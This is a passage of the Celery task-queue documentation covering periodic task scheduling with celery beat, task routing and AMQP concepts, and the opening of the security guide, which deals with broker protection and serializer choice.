or by adding it to your configuration module if you have set one up using ``app.config_from_object``. See :ref:`celerytut-configuration` for more information about configuration options. The default scheduler (storing the schedule in the :file:`celerybeat-schedule` file) will automatically detect that the time zone has changed, and so will reset the schedule itself, but other schedulers may not be so smart (e.g., the Django database scheduler, see below) and in that case you'll have to reset the schedule manually. .. admonition:: Django Users Celery recommends and is compatible with the new ``USE_TZ`` setting introduced in Django 1.4. For Django users the time zone specified in the ``TIME_ZONE`` setting will be used, or you can specify a custom time zone for Celery alone by using the :setting:`timezone` setting. The database scheduler won't reset when timezone related settings change, so you must do this manually: .. code-block:: console $ python manage.py shell >>> from djcelery.models import PeriodicTask >>> PeriodicTask.objects.update(last_run_at=None) Django-Celery only supports Celery 4.0 and below, for Celery 4.0 and above, do as follow: .. code-block:: console $ python manage.py shell >>> from django_celery_beat.models import PeriodicTask >>> PeriodicTask.objects.update(last_run_at=None) .. _beat-entries: Entries ======= To call a task periodically you have to add an entry to the beat schedule list. .. code-block:: python from celery import Celery from celery.schedules import crontab app = Celery() @app.on_after_configure.connect def setup_periodic_tasks(sender, **kwargs): # Calls test('hello') every 10 seconds. sender.add_periodic_task(10.0, test.s('hello'), name='add every 10') # Calls test('world') every 30 seconds sender.add_periodic_task(30.0, test.s('world'), expires=10) # Executes every Monday morning at 7:30 a.m. sender.add_periodic_task( crontab(hour=7, minute=30, day_of_week=1), test.s('Happy Mondays!'), ) @app.task def test(arg): print(arg) @app.task def add(x, y): z = x + y print(z) Setting these up from within the :data:`~@on_after_configure` handler means that we'll not evaluate the app at module level when using ``test.s()``. Note that :data:`~@on_after_configure` is sent after the app is set up, so tasks outside the module where the app is declared (e.g. in a `tasks.py` file located by :meth:`celery.Celery.autodiscover_tasks`) must use a later signal, such as :data:`~@on_after_finalize`. The :meth:`~@add_periodic_task` function will add the entry to the :setting:`beat_schedule` setting behind the scenes, and the same setting can also be used to set up periodic tasks manually: Example: Run the `tasks.add` task every 30 seconds. .. code-block:: python app.conf.beat_schedule = { 'add-every-30-seconds': { 'task': 'tasks.add', 'schedule': 30.0, 'args': (16, 16) }, } app.conf.timezone = 'UTC' .. note:: If you're wondering where these settings should go then please see :ref:`celerytut-configuration`. You can either set these options on your app directly or you can keep a separate module for configuration. If you want to use a single item tuple for `args`, don't forget that the constructor is a comma, and not a pair of parentheses. Using a :class:`~datetime.timedelta` for the schedule means the task will be sent in 30 second intervals (the first task will be sent 30 seconds after `celery beat` starts, and then every 30 seconds after the last run). A Crontab like schedule also exists, see the section on `Crontab schedules`_. Like with :command:`cron`, the tasks may overlap if the first task doesn't complete before the next. If that's a concern you should use a locking strategy to ensure only one instance can run at a time (see for example :ref:`cookbook-task-serial`). .. _beat-entry-fields: Available Fields ---------------- * `task` The name of the task to execute. * `schedule` The frequency of execution. This can be the number of seconds as an integer, a :class:`~datetime.timedelta`, or a :class:`~celery.schedules.crontab`. You can also define your own custom schedule types, by extending the interface of :class:`~celery.schedules.schedule`. * `args` Positional arguments (:class:`list` or :class:`tuple`). * `kwargs` Keyword arguments (:class:`dict`). * `options` Execution options (:class:`dict`). This can be any argument supported by :meth:`~celery.app.task.Task.apply_async` -- `exchange`, `routing_key`, `expires`, and so on. * `relative` If `relative` is true :class:`~datetime.timedelta` schedules are scheduled "by the clock." This means the frequency is rounded to the nearest second, minute, hour or day depending on the period of the :class:`~datetime.timedelta`. By default `relative` is false, the frequency isn't rounded and will be relative to the time when :program:`celery beat` was started. .. _beat-crontab: Crontab schedules ================= If you want more control over when the task is executed, for example, a particular time of day or day of the week, you can use the :class:`~celery.schedules.crontab` schedule type: .. code-block:: python from celery.schedules import crontab app.conf.beat_schedule = { # Executes every Monday morning at 7:30 a.m. 'add-every-monday-morning': { 'task': 'tasks.add', 'schedule': crontab(hour=7, minute=30, day_of_week=1), 'args': (16, 16), }, } The syntax of these Crontab expressions are very flexible. Some examples: +-----------------------------------------+--------------------------------------------+ | **Example** | **Meaning** | +-----------------------------------------+--------------------------------------------+ | ``crontab()`` | Execute every minute. | +-----------------------------------------+--------------------------------------------+ | ``crontab(minute=0, hour=0)`` | Execute daily at midnight. | +-----------------------------------------+--------------------------------------------+ | ``crontab(minute=0, hour='*/3')`` | Execute every three hours: | | | midnight, 3am, 6am, 9am, | | | noon, 3pm, 6pm, 9pm. | +-----------------------------------------+--------------------------------------------+ | ``crontab(minute=0,`` | Same as previous. | | ``hour='0,3,6,9,12,15,18,21')`` | | +-----------------------------------------+--------------------------------------------+ | ``crontab(minute='*/15')`` | Execute every 15 minutes. | +-----------------------------------------+--------------------------------------------+ | ``crontab(day_of_week='sunday')`` | Execute every minute (!) at Sundays. | +-----------------------------------------+--------------------------------------------+ | ``crontab(minute='*',`` | Same as previous. | | ``hour='*',`` | | | ``day_of_week='sun')`` | | +-----------------------------------------+--------------------------------------------+ | ``crontab(minute='*/10',`` | Execute every ten minutes, but only | | ``hour='3,17,22',`` | between 3-4 am, 5-6 pm, and 10-11 pm on | | ``day_of_week='thu,fri')`` | Thursdays or Fridays. | +-----------------------------------------+--------------------------------------------+ | ``crontab(minute=0, hour='*/2,*/3')`` | Execute every even hour, and every hour | | | divisible by three. This means: | | | at every hour *except*: 1am, | | | 5am, 7am, 11am, 1pm, 5pm, 7pm, | | | 11pm | +-----------------------------------------+--------------------------------------------+ | ``crontab(minute=0, hour='*/5')`` | Execute hour divisible by 5. This means | | | that it is triggered at 3pm, not 5pm | | | (since 3pm equals the 24-hour clock | | | value of "15", which is divisible by 5). | +-----------------------------------------+--------------------------------------------+ | ``crontab(minute=0, hour='*/3,8-17')`` | Execute every hour divisible by 3, and | | | every hour during office hours (8am-5pm). | +-----------------------------------------+--------------------------------------------+ | ``crontab(0, 0, day_of_month='2')`` | Execute on the second day of every month. | | | | +-----------------------------------------+--------------------------------------------+ | ``crontab(0, 0,`` | Execute on every even numbered day. | | ``day_of_month='2-30/2')`` | | +-----------------------------------------+--------------------------------------------+ | ``crontab(0, 0,`` | Execute on the first and third weeks of | | ``day_of_month='1-7,15-21')`` | the month. | +-----------------------------------------+--------------------------------------------+ | ``crontab(0, 0, day_of_month='11',`` | Execute on the eleventh of May every year. | | ``month_of_year='5')`` | | +-----------------------------------------+--------------------------------------------+ | ``crontab(0, 0,`` | Execute every day on the first month | | ``month_of_year='*/3')`` | of every quarter. | +-----------------------------------------+--------------------------------------------+ See :class:`celery.schedules.crontab` for more documentation. .. _beat-solar: Solar schedules ================= If you have a task that should be executed according to sunrise, sunset, dawn or dusk, you can use the :class:`~celery.schedules.solar` schedule type: .. code-block:: python from celery.schedules import solar app.conf.beat_schedule = { # Executes at sunset in Melbourne 'add-at-melbourne-sunset': { 'task': 'tasks.add', 'schedule': solar('sunset', -37.81753, 144.96715), 'args': (16, 16), }, } The arguments are simply: ``solar(event, latitude, longitude)`` Be sure to use the correct sign for latitude and longitude: +---------------+-------------------+----------------------+ | **Sign** | **Argument** | **Meaning** | +---------------+-------------------+----------------------+ | ``+`` | ``latitude`` | North | +---------------+-------------------+----------------------+ | ``-`` | ``latitude`` | South | +---------------+-------------------+----------------------+ | ``+`` | ``longitude`` | East | +---------------+-------------------+----------------------+ | ``-`` | ``longitude`` | West | +---------------+-------------------+----------------------+ Possible event types are: +-----------------------------------------+--------------------------------------------+ | **Event** | **Meaning** | +-----------------------------------------+--------------------------------------------+ | ``dawn_astronomical`` | Execute at the moment after which the sky | | | is no longer completely dark. This is when | | | the sun is 18 degrees below the horizon. | +-----------------------------------------+--------------------------------------------+ | ``dawn_nautical`` | Execute when there's enough sunlight for | | | the horizon and some objects to be | | | distinguishable; formally, when the sun is | | | 12 degrees below the horizon. | +-----------------------------------------+--------------------------------------------+ | ``dawn_civil`` | Execute when there's enough light for | | | objects to be distinguishable so that | | | outdoor activities can commence; | | | formally, when the Sun is 6 degrees below | | | the horizon. | +-----------------------------------------+--------------------------------------------+ | ``sunrise`` | Execute when the upper edge of the sun | | | appears over the eastern horizon in the | | | morning. | +-----------------------------------------+--------------------------------------------+ | ``solar_noon`` | Execute when the sun is highest above the | | | horizon on that day. | +-----------------------------------------+--------------------------------------------+ | ``sunset`` | Execute when the trailing edge of the sun | | | disappears over the western horizon in the | | | evening. | +-----------------------------------------+--------------------------------------------+ | ``dusk_civil`` | Execute at the end of civil twilight, when | | | objects are still distinguishable and some | | | stars and planets are visible. Formally, | | | when the sun is 6 degrees below the | | | horizon. | +-----------------------------------------+--------------------------------------------+ | ``dusk_nautical`` | Execute when the sun is 12 degrees below | | | the horizon. Objects are no longer | | | distinguishable, and the horizon is no | | | longer visible to the naked eye. | +-----------------------------------------+--------------------------------------------+ | ``dusk_astronomical`` | Execute at the moment after which the sky | | | becomes completely dark; formally, when | | | the sun is 18 degrees below the horizon. | +-----------------------------------------+--------------------------------------------+ All solar events are calculated using UTC, and are therefore unaffected by your timezone setting. In polar regions, the sun may not rise or set every day. The scheduler is able to handle these cases (i.e., a ``sunrise`` event won't run on a day when the sun doesn't rise). The one exception is ``solar_noon``, which is formally defined as the moment the sun transits the celestial meridian, and will occur every day even if the sun is below the horizon. Twilight is defined as the period between dawn and sunrise; and between sunset and dusk. You can schedule an event according to "twilight" depending on your definition of twilight (civil, nautical, or astronomical), and whether you want the event to take place at the beginning or end of twilight, using the appropriate event from the list above. See :class:`celery.schedules.solar` for more documentation. .. _beat-starting: Starting the Scheduler ====================== To start the :program:`celery beat` service: .. code-block:: console $ celery -A proj beat You can also embed `beat` inside the worker by enabling the workers :option:`-B ` option, this is convenient if you'll never run more than one worker node, but it's not commonly used and for that reason isn't recommended for production use: .. code-block:: console $ celery -A proj worker -B Beat needs to store the last run times of the tasks in a local database file (named `celerybeat-schedule` by default), so it needs access to write in the current directory, or alternatively you can specify a custom location for this file: .. code-block:: console $ celery -A proj beat -s /home/celery/var/run/celerybeat-schedule .. note:: To daemonize beat see :ref:`daemonizing`. .. _beat-custom-schedulers: Using custom scheduler classes ------------------------------ Custom scheduler classes can be specified on the command-line (the :option:`--scheduler ` argument). The default scheduler is the :class:`celery.beat.PersistentScheduler`, that simply keeps track of the last run times in a local :mod:`shelve` database file. There's also the :pypi:`django-celery-beat` extension that stores the schedule in the Django database, and presents a convenient admin interface to manage periodic tasks at runtime. To install and use this extension: #. Use :command:`pip` to install the package: .. code-block:: console $ pip install django-celery-beat #. Add the ``django_celery_beat`` module to ``INSTALLED_APPS`` in your Django project' :file:`settings.py`:: INSTALLED_APPS = ( ..., 'django_celery_beat', ) Note that there is no dash in the module name, only underscores. #. Apply Django database migrations so that the necessary tables are created: .. code-block:: console $ python manage.py migrate #. Start the :program:`celery beat` service using the ``django_celery_beat.schedulers:DatabaseScheduler`` scheduler: .. code-block:: console $ celery -A proj beat -l INFO --scheduler django_celery_beat.schedulers:DatabaseScheduler Note: You may also add this as the :setting:`beat_scheduler` setting directly. #. Visit the Django-Admin interface to set up some periodic tasks. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/userguide/routing.rst0000664000175000017500000005737400000000000020062 0ustar00asifasif00000000000000.. _guide-routing: =============== Routing Tasks =============== .. note:: Alternate routing concepts like topic and fanout is not available for all transports, please consult the :ref:`transport comparison table `. .. contents:: :local: .. _routing-basics: Basics ====== .. _routing-automatic: Automatic routing ----------------- The simplest way to do routing is to use the :setting:`task_create_missing_queues` setting (on by default). With this setting on, a named queue that's not already defined in :setting:`task_queues` will be created automatically. This makes it easy to perform simple routing tasks. Say you have two servers, `x`, and `y` that handle regular tasks, and one server `z`, that only handles feed related tasks. You can use this configuration:: task_routes = {'feed.tasks.import_feed': {'queue': 'feeds'}} With this route enabled import feed tasks will be routed to the `"feeds"` queue, while all other tasks will be routed to the default queue (named `"celery"` for historical reasons). Alternatively, you can use glob pattern matching, or even regular expressions, to match all tasks in the ``feed.tasks`` name-space: .. code-block:: python app.conf.task_routes = {'feed.tasks.*': {'queue': 'feeds'}} If the order of matching patterns is important you should specify the router in *items* format instead: .. code-block:: python task_routes = ([ ('feed.tasks.*', {'queue': 'feeds'}), ('web.tasks.*', {'queue': 'web'}), (re.compile(r'(video|image)\.tasks\..*'), {'queue': 'media'}), ],) .. note:: The :setting:`task_routes` setting can either be a dictionary, or a list of router objects, so in this case we need to specify the setting as a tuple containing a list. After installing the router, you can start server `z` to only process the feeds queue like this: .. code-block:: console user@z:/$ celery -A proj worker -Q feeds You can specify as many queues as you want, so you can make this server process the default queue as well: .. code-block:: console user@z:/$ celery -A proj worker -Q feeds,celery .. _routing-changing-default-queue: Changing the name of the default queue ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ You can change the name of the default queue by using the following configuration: .. code-block:: python app.conf.task_default_queue = 'default' .. _routing-autoqueue-details: How the queues are defined ~~~~~~~~~~~~~~~~~~~~~~~~~~ The point with this feature is to hide the complex AMQP protocol for users with only basic needs. However -- you may still be interested in how these queues are declared. A queue named `"video"` will be created with the following settings: .. code-block:: javascript {'exchange': 'video', 'exchange_type': 'direct', 'routing_key': 'video'} The non-AMQP backends like `Redis` or `SQS` don't support exchanges, so they require the exchange to have the same name as the queue. Using this design ensures it will work for them as well. .. _routing-manual: Manual routing -------------- Say you have two servers, `x`, and `y` that handle regular tasks, and one server `z`, that only handles feed related tasks, you can use this configuration: .. code-block:: python from kombu import Queue app.conf.task_default_queue = 'default' app.conf.task_queues = ( Queue('default', routing_key='task.#'), Queue('feed_tasks', routing_key='feed.#'), ) app.conf.task_default_exchange = 'tasks' app.conf.task_default_exchange_type = 'topic' app.conf.task_default_routing_key = 'task.default' :setting:`task_queues` is a list of :class:`~kombu.entity.Queue` instances. If you don't set the exchange or exchange type values for a key, these will be taken from the :setting:`task_default_exchange` and :setting:`task_default_exchange_type` settings. To route a task to the `feed_tasks` queue, you can add an entry in the :setting:`task_routes` setting: .. code-block:: python task_routes = { 'feeds.tasks.import_feed': { 'queue': 'feed_tasks', 'routing_key': 'feed.import', }, } You can also override this using the `routing_key` argument to :meth:`Task.apply_async`, or :func:`~celery.execute.send_task`: >>> from feeds.tasks import import_feed >>> import_feed.apply_async(args=['http://cnn.com/rss'], ... queue='feed_tasks', ... routing_key='feed.import') To make server `z` consume from the feed queue exclusively you can start it with the :option:`celery worker -Q` option: .. code-block:: console user@z:/$ celery -A proj worker -Q feed_tasks --hostname=z@%h Servers `x` and `y` must be configured to consume from the default queue: .. code-block:: console user@x:/$ celery -A proj worker -Q default --hostname=x@%h user@y:/$ celery -A proj worker -Q default --hostname=y@%h If you want, you can even have your feed processing worker handle regular tasks as well, maybe in times when there's a lot of work to do: .. code-block:: console user@z:/$ celery -A proj worker -Q feed_tasks,default --hostname=z@%h If you have another queue but on another exchange you want to add, just specify a custom exchange and exchange type: .. code-block:: python from kombu import Exchange, Queue app.conf.task_queues = ( Queue('feed_tasks', routing_key='feed.#'), Queue('regular_tasks', routing_key='task.#'), Queue('image_tasks', exchange=Exchange('mediatasks', type='direct'), routing_key='image.compress'), ) If you're confused about these terms, you should read up on AMQP. .. seealso:: In addition to the :ref:`amqp-primer` below, there's `Rabbits and Warrens`_, an excellent blog post describing queues and exchanges. There's also The `CloudAMQP tutorial`, For users of RabbitMQ the `RabbitMQ FAQ`_ could be useful as a source of information. .. _`Rabbits and Warrens`: http://web.archive.org/web/20160323134044/http://blogs.digitar.com/jjww/2009/01/rabbits-and-warrens/ .. _`CloudAMQP tutorial`: amqp in 10 minutes part 3 https://www.cloudamqp.com/blog/2015-09-03-part4-rabbitmq-for-beginners-exchanges-routing-keys-bindings.html .. _`RabbitMQ FAQ`: https://www.rabbitmq.com/faq.html .. _routing-special_options: Special Routing Options ======================= .. _routing-options-rabbitmq-priorities: RabbitMQ Message Priorities --------------------------- :supported transports: RabbitMQ .. versionadded:: 4.0 Queues can be configured to support priorities by setting the ``x-max-priority`` argument: .. code-block:: python from kombu import Exchange, Queue app.conf.task_queues = [ Queue('tasks', Exchange('tasks'), routing_key='tasks', queue_arguments={'x-max-priority': 10}), ] A default value for all queues can be set using the :setting:`task_queue_max_priority` setting: .. code-block:: python app.conf.task_queue_max_priority = 10 A default priority for all tasks can also be specified using the :setting:`task_default_priority` setting: .. code-block:: python app.conf.task_default_priority = 5 .. _amqp-primer: Redis Message Priorities ------------------------ :supported transports: Redis While the Celery Redis transport does honor the priority field, Redis itself has no notion of priorities. Please read this note before attempting to implement priorities with Redis as you may experience some unexpected behavior. To start scheduling tasks based on priorities you need to configure queue_order_strategy transport option. .. code-block:: python app.conf.broker_transport_options = { 'queue_order_strategy': 'priority', } The priority support is implemented by creating n lists for each queue. This means that even though there are 10 (0-9) priority levels, these are consolidated into 4 levels by default to save resources. This means that a queue named celery will really be split into 4 queues. The highest priority queue will be named celery, and the the other queues will have a separator (by default `\x06\x16`) and their priority number appended to the queue name. .. code-block:: python ['celery', 'celery\x06\x163', 'celery\x06\x166', 'celery\x06\x169'] If you want more priority levels or a different separator you can set the priority_steps and sep transport options: .. code-block:: python app.conf.broker_transport_options = { 'priority_steps': list(range(10)), 'sep': ':', 'queue_order_strategy': 'priority', } The config above will give you these queue names: .. code-block:: python ['celery', 'celery:1', 'celery:2', 'celery:3', 'celery:4', 'celery:5', 'celery:6', 'celery:7', 'celery:8', 'celery:9'] That said, note that this will never be as good as priorities implemented at the server level, and may be approximate at best. But it may still be good enough for your application. AMQP Primer =========== Messages -------- A message consists of headers and a body. Celery uses headers to store the content type of the message and its content encoding. The content type is usually the serialization format used to serialize the message. The body contains the name of the task to execute, the task id (UUID), the arguments to apply it with and some additional meta-data -- like the number of retries or an ETA. This is an example task message represented as a Python dictionary: .. code-block:: javascript {'task': 'myapp.tasks.add', 'id': '54086c5e-6193-4575-8308-dbab76798756', 'args': [4, 4], 'kwargs': {}} .. _amqp-producers-consumers-brokers: Producers, consumers, and brokers --------------------------------- The client sending messages is typically called a *publisher*, or a *producer*, while the entity receiving messages is called a *consumer*. The *broker* is the message server, routing messages from producers to consumers. You're likely to see these terms used a lot in AMQP related material. .. _amqp-exchanges-queues-keys: Exchanges, queues, and routing keys ----------------------------------- 1. Messages are sent to exchanges. 2. An exchange routes messages to one or more queues. Several exchange types exists, providing different ways to do routing, or implementing different messaging scenarios. 3. The message waits in the queue until someone consumes it. 4. The message is deleted from the queue when it has been acknowledged. The steps required to send and receive messages are: 1. Create an exchange 2. Create a queue 3. Bind the queue to the exchange. Celery automatically creates the entities necessary for the queues in :setting:`task_queues` to work (except if the queue's `auto_declare` setting is set to :const:`False`). Here's an example queue configuration with three queues; One for video, one for images, and one default queue for everything else: .. code-block:: python from kombu import Exchange, Queue app.conf.task_queues = ( Queue('default', Exchange('default'), routing_key='default'), Queue('videos', Exchange('media'), routing_key='media.video'), Queue('images', Exchange('media'), routing_key='media.image'), ) app.conf.task_default_queue = 'default' app.conf.task_default_exchange_type = 'direct' app.conf.task_default_routing_key = 'default' .. _amqp-exchange-types: Exchange types -------------- The exchange type defines how the messages are routed through the exchange. The exchange types defined in the standard are `direct`, `topic`, `fanout` and `headers`. Also non-standard exchange types are available as plug-ins to RabbitMQ, like the `last-value-cache plug-in`_ by Michael Bridgen. .. _`last-value-cache plug-in`: https://github.com/squaremo/rabbitmq-lvc-plugin .. _amqp-exchange-type-direct: Direct exchanges ~~~~~~~~~~~~~~~~ Direct exchanges match by exact routing keys, so a queue bound by the routing key `video` only receives messages with that routing key. .. _amqp-exchange-type-topic: Topic exchanges ~~~~~~~~~~~~~~~ Topic exchanges matches routing keys using dot-separated words, and the wild-card characters: ``*`` (matches a single word), and ``#`` (matches zero or more words). With routing keys like ``usa.news``, ``usa.weather``, ``norway.news``, and ``norway.weather``, bindings could be ``*.news`` (all news), ``usa.#`` (all items in the USA), or ``usa.weather`` (all USA weather items). .. _amqp-api: Related API commands -------------------- .. method:: exchange.declare(exchange_name, type, passive, durable, auto_delete, internal) Declares an exchange by name. See :meth:`amqp:Channel.exchange_declare `. :keyword passive: Passive means the exchange won't be created, but you can use this to check if the exchange already exists. :keyword durable: Durable exchanges are persistent (i.e., they survive a broker restart). :keyword auto_delete: This means the exchange will be deleted by the broker when there are no more queues using it. .. method:: queue.declare(queue_name, passive, durable, exclusive, auto_delete) Declares a queue by name. See :meth:`amqp:Channel.queue_declare ` Exclusive queues can only be consumed from by the current connection. Exclusive also implies `auto_delete`. .. method:: queue.bind(queue_name, exchange_name, routing_key) Binds a queue to an exchange with a routing key. Unbound queues won't receive messages, so this is necessary. See :meth:`amqp:Channel.queue_bind ` .. method:: queue.delete(name, if_unused=False, if_empty=False) Deletes a queue and its binding. See :meth:`amqp:Channel.queue_delete ` .. method:: exchange.delete(name, if_unused=False) Deletes an exchange. See :meth:`amqp:Channel.exchange_delete ` .. note:: Declaring doesn't necessarily mean "create". When you declare you *assert* that the entity exists and that it's operable. There's no rule as to whom should initially create the exchange/queue/binding, whether consumer or producer. Usually the first one to need it will be the one to create it. .. _amqp-api-hands-on: Hands-on with the API --------------------- Celery comes with a tool called :program:`celery amqp` that's used for command line access to the AMQP API, enabling access to administration tasks like creating/deleting queues and exchanges, purging queues or sending messages. It can also be used for non-AMQP brokers, but different implementation may not implement all commands. You can write commands directly in the arguments to :program:`celery amqp`, or just start with no arguments to start it in shell-mode: .. code-block:: console $ celery -A proj amqp -> connecting to amqp://guest@localhost:5672/. -> connected. 1> Here ``1>`` is the prompt. The number 1, is the number of commands you have executed so far. Type ``help`` for a list of commands available. It also supports auto-completion, so you can start typing a command and then hit the `tab` key to show a list of possible matches. Let's create a queue you can send messages to: .. code-block:: console $ celery -A proj amqp 1> exchange.declare testexchange direct ok. 2> queue.declare testqueue ok. queue:testqueue messages:0 consumers:0. 3> queue.bind testqueue testexchange testkey ok. This created the direct exchange ``testexchange``, and a queue named ``testqueue``. The queue is bound to the exchange using the routing key ``testkey``. From now on all messages sent to the exchange ``testexchange`` with routing key ``testkey`` will be moved to this queue. You can send a message by using the ``basic.publish`` command: .. code-block:: console 4> basic.publish 'This is a message!' testexchange testkey ok. Now that the message is sent you can retrieve it again. You can use the ``basic.get`` command here, that polls for new messages on the queue in a synchronous manner (this is OK for maintenance tasks, but for services you want to use ``basic.consume`` instead) Pop a message off the queue: .. code-block:: console 5> basic.get testqueue {'body': 'This is a message!', 'delivery_info': {'delivery_tag': 1, 'exchange': u'testexchange', 'message_count': 0, 'redelivered': False, 'routing_key': u'testkey'}, 'properties': {}} AMQP uses acknowledgment to signify that a message has been received and processed successfully. If the message hasn't been acknowledged and consumer channel is closed, the message will be delivered to another consumer. Note the delivery tag listed in the structure above; Within a connection channel, every received message has a unique delivery tag, This tag is used to acknowledge the message. Also note that delivery tags aren't unique across connections, so in another client the delivery tag `1` might point to a different message than in this channel. You can acknowledge the message you received using ``basic.ack``: .. code-block:: console 6> basic.ack 1 ok. To clean up after our test session you should delete the entities you created: .. code-block:: console 7> queue.delete testqueue ok. 0 messages deleted. 8> exchange.delete testexchange ok. .. _routing-tasks: Routing Tasks ============= .. _routing-defining-queues: Defining queues --------------- In Celery available queues are defined by the :setting:`task_queues` setting. Here's an example queue configuration with three queues; One for video, one for images, and one default queue for everything else: .. code-block:: python default_exchange = Exchange('default', type='direct') media_exchange = Exchange('media', type='direct') app.conf.task_queues = ( Queue('default', default_exchange, routing_key='default'), Queue('videos', media_exchange, routing_key='media.video'), Queue('images', media_exchange, routing_key='media.image') ) app.conf.task_default_queue = 'default' app.conf.task_default_exchange = 'default' app.conf.task_default_routing_key = 'default' Here, the :setting:`task_default_queue` will be used to route tasks that doesn't have an explicit route. The default exchange, exchange type, and routing key will be used as the default routing values for tasks, and as the default values for entries in :setting:`task_queues`. Multiple bindings to a single queue are also supported. Here's an example of two routing keys that are both bound to the same queue: .. code-block:: python from kombu import Exchange, Queue, binding media_exchange = Exchange('media', type='direct') CELERY_QUEUES = ( Queue('media', [ binding(media_exchange, routing_key='media.video'), binding(media_exchange, routing_key='media.image'), ]), ) .. _routing-task-destination: Specifying task destination --------------------------- The destination for a task is decided by the following (in order): 1. The routing arguments to :func:`Task.apply_async`. 2. Routing related attributes defined on the :class:`~celery.app.task.Task` itself. 3. The :ref:`routers` defined in :setting:`task_routes`. It's considered best practice to not hard-code these settings, but rather leave that as configuration options by using :ref:`routers`; This is the most flexible approach, but sensible defaults can still be set as task attributes. .. _routers: Routers ------- A router is a function that decides the routing options for a task. All you need to define a new router is to define a function with the signature ``(name, args, kwargs, options, task=None, **kw)``: .. code-block:: python def route_task(name, args, kwargs, options, task=None, **kw): if name == 'myapp.tasks.compress_video': return {'exchange': 'video', 'exchange_type': 'topic', 'routing_key': 'video.compress'} If you return the ``queue`` key, it'll expand with the defined settings of that queue in :setting:`task_queues`: .. code-block:: javascript {'queue': 'video', 'routing_key': 'video.compress'} becomes --> .. code-block:: javascript {'queue': 'video', 'exchange': 'video', 'exchange_type': 'topic', 'routing_key': 'video.compress'} You install router classes by adding them to the :setting:`task_routes` setting: .. code-block:: python task_routes = (route_task,) Router functions can also be added by name: .. code-block:: python task_routes = ('myapp.routers.route_task',) For simple task name -> route mappings like the router example above, you can simply drop a dict into :setting:`task_routes` to get the same behavior: .. code-block:: python task_routes = { 'myapp.tasks.compress_video': { 'queue': 'video', 'routing_key': 'video.compress', }, } The routers will then be traversed in order, it will stop at the first router returning a true value, and use that as the final route for the task. You can also have multiple routers defined in a sequence: .. code-block:: python task_routes = [ route_task, { 'myapp.tasks.compress_video': { 'queue': 'video', 'routing_key': 'video.compress', }, ] The routers will then be visited in turn, and the first to return a value will be chosen. If you\'re using Redis or RabbitMQ you can also specify the queue\'s default priority in the route. .. code-block:: python task_routes = { 'myapp.tasks.compress_video': { 'queue': 'video', 'routing_key': 'video.compress', 'priority': 10, }, } Similarly, calling `apply_async` on a task will override that default priority. .. code-block:: python task.apply_async(priority=0) .. admonition:: Priority Order and Cluster Responsiveness It is important to note that, due to worker prefetching, if a bunch of tasks submitted at the same time they may be out of priority order at first. Disabling worker prefetching will prevent this issue, but may cause less than ideal performance for small, fast tasks. In most cases, simply reducing `worker_prefetch_multiplier` to 1 is an easier and cleaner way to increase the responsiveness of your system without the costs of disabling prefetching entirely. Note that priorities values are sorted in reverse when using the redis broker: 0 being highest priority. Broadcast --------- Celery can also support broadcast routing. Here is an example exchange ``broadcast_tasks`` that delivers copies of tasks to all workers connected to it: .. code-block:: python from kombu.common import Broadcast app.conf.task_queues = (Broadcast('broadcast_tasks'),) app.conf.task_routes = { 'tasks.reload_cache': { 'queue': 'broadcast_tasks', 'exchange': 'broadcast_tasks' } } Now the ``tasks.reload_cache`` task will be sent to every worker consuming from this queue. Here is another example of broadcast routing, this time with a :program:`celery beat` schedule: .. code-block:: python from kombu.common import Broadcast from celery.schedules import crontab app.conf.task_queues = (Broadcast('broadcast_tasks'),) app.conf.beat_schedule = { 'test-task': { 'task': 'tasks.reload_cache', 'schedule': crontab(minute=0, hour='*/3'), 'options': {'exchange': 'broadcast_tasks'} }, } .. admonition:: Broadcast & Results Note that Celery result doesn't define what happens if two tasks have the same task_id. If the same task is distributed to more than one worker, then the state history may not be preserved. It's a good idea to set the ``task.ignore_result`` attribute in this case. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/userguide/security.rst0000664000175000017500000002060500000000000020225 0ustar00asifasif00000000000000.. _guide-security: ========== Security ========== .. contents:: :local: Introduction ============ While Celery is written with security in mind, it should be treated as an unsafe component. Depending on your `Security Policy`_, there are various steps you can take to make your Celery installation more secure. .. _`Security Policy`: https://en.wikipedia.org/wiki/Security_policy Areas of Concern ================ Broker ------ It's imperative that the broker is guarded from unwanted access, especially if accessible to the public. By default, workers trust that the data they get from the broker hasn't been tampered with. See `Message Signing`_ for information on how to make the broker connection more trustworthy. The first line of defense should be to put a firewall in front of the broker, allowing only white-listed machines to access it. Keep in mind that both firewall misconfiguration, and temporarily disabling the firewall, is common in the real world. Solid security policy includes monitoring of firewall equipment to detect if they've been disabled, be it accidentally or on purpose. In other words, one shouldn't blindly trust the firewall either. If your broker supports fine-grained access control, like RabbitMQ, this is something you should look at enabling. See for example http://www.rabbitmq.com/access-control.html. If supported by your broker backend, you can enable end-to-end SSL encryption and authentication using :setting:`broker_use_ssl`. Client ------ In Celery, "client" refers to anything that sends messages to the broker, for example web-servers that apply tasks. Having the broker properly secured doesn't matter if arbitrary messages can be sent through a client. *[Need more text here]* Worker ------ The default permissions of tasks running inside a worker are the same ones as the privileges of the worker itself. This applies to resources, such as; memory, file-systems, and devices. An exception to this rule is when using the multiprocessing based task pool, which is currently the default. In this case, the task will have access to any memory copied as a result of the :func:`fork` call, and access to memory contents written by parent tasks in the same worker child process. Limiting access to memory contents can be done by launching every task in a subprocess (:func:`fork` + :func:`execve`). Limiting file-system and device access can be accomplished by using `chroot`_, `jail`_, `sandboxing`_, virtual machines, or other mechanisms as enabled by the platform or additional software. Note also that any task executed in the worker will have the same network access as the machine on which it's running. If the worker is located on an internal network it's recommended to add firewall rules for outbound traffic. .. _`chroot`: https://en.wikipedia.org/wiki/Chroot .. _`jail`: https://en.wikipedia.org/wiki/FreeBSD_jail .. _`sandboxing`: https://en.wikipedia.org/wiki/Sandbox_(computer_security) .. _security-serializers: Serializers =========== The default serializer is JSON since version 4.0, but since it has only support for a restricted set of types you may want to consider using pickle for serialization instead. The `pickle` serializer is convenient as it can serialize almost any Python object, even functions with some work, but for the same reasons `pickle` is inherently insecure [*]_, and should be avoided whenever clients are untrusted or unauthenticated. You can disable untrusted content by specifying a white-list of accepted content-types in the :setting:`accept_content` setting: .. versionadded:: 3.0.18 .. note:: This setting was first supported in version 3.0.18. If you're running an earlier version it will simply be ignored, so make sure you're running a version that supports it. .. code-block:: python accept_content = ['json'] This accepts a list of serializer names and 